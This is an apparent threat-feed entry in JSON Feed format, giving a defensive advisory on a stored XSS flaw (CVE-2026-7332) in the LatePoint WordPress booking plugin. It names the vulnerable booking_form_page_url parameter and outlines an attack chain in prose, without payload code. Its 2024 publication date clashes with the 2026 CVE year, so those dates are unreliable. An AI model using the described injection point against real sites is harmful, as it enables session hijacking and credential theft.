{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/cve-2026-7332/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-7332"}],"_cs_exploited":false,"_cs_products":["LatePoint – Calendar Booking Plugin for Appointments and Events plugin \u003c= 5.5.0"],"_cs_severities":["medium"],"_cs_tags":["wordpress","xss","stored-xss","cve-2026-7332","plugin"],"_cs_type":"advisory","_cs_vendors":["WordPress"],"content_html":"\u003cp\u003eThe LatePoint – Calendar Booking Plugin for Appointments and Events plugin for WordPress is susceptible to a stored cross-site scripting (XSS) vulnerability. This flaw, identified as CVE-2026-7332, exists in all versions up to and including 5.5.0. Unauthenticated attackers can exploit this vulnerability by injecting malicious web scripts into the \u0026lsquo;booking_form_page_url\u0026rsquo; parameter. This vulnerability does not require Stripe to be configured. Successful exploitation allows attackers to execute arbitrary JavaScript code in the context of a user\u0026rsquo;s browser when they access a page containing the injected script. This can lead to account compromise, data theft, or other malicious activities.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker crafts a malicious URL containing a JavaScript payload in the \u003ccode\u003ebooking_form_page_url\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eThe attacker submits the crafted URL to a WordPress page utilizing the vulnerable LatePoint plugin.\u003c/li\u003e\n\u003cli\u003eThe LatePoint plugin fails to properly sanitize or escape the input provided in the \u003ccode\u003ebooking_form_page_url\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eThe malicious script is stored in the WordPress database, specifically within the plugin\u0026rsquo;s settings or booking data.\u003c/li\u003e\n\u003cli\u003eA legitimate user accesses the WordPress page where the malicious script is stored and rendered.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser executes the attacker-injected JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe malicious script can perform actions such as stealing cookies, redirecting the user to a phishing site, or modifying page content.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control over the user\u0026rsquo;s session or injects further malicious content into the website.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this stored XSS vulnerability allows an unauthenticated attacker to execute arbitrary JavaScript code in a user\u0026rsquo;s browser. The potential impact includes session hijacking, defacement of the website, redirection to malicious sites, or the theft of sensitive information such as user credentials and financial data. While the specific number of affected installations is unknown, the LatePoint plugin is actively installed on WordPress sites, representing a significant attack surface.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the LatePoint – Calendar Booking Plugin for Appointments and Events to a version greater than 5.5.0 to patch CVE-2026-7332.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect LatePoint XSS Attempt via booking_form_page_url\u003c/code\u003e to identify potential exploitation attempts by monitoring web server logs.\u003c/li\u003e\n\u003cli\u003eReview and sanitize existing data associated with the LatePoint plugin in the WordPress database for any injected malicious scripts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-latepoint-xss/","summary":"The LatePoint WordPress plugin is vulnerable to stored XSS via the booking_form_page_url parameter, allowing unauthenticated attackers to inject arbitrary web scripts in pages that execute when a user accesses the injected page.","title":"LatePoint WordPress Plugin Stored XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-latepoint-xss/"}],"language":"en","title":"CraftedSignal Threat Feed — Cve-2026-7332","version":"https://jsonfeed.org/version/1.1"}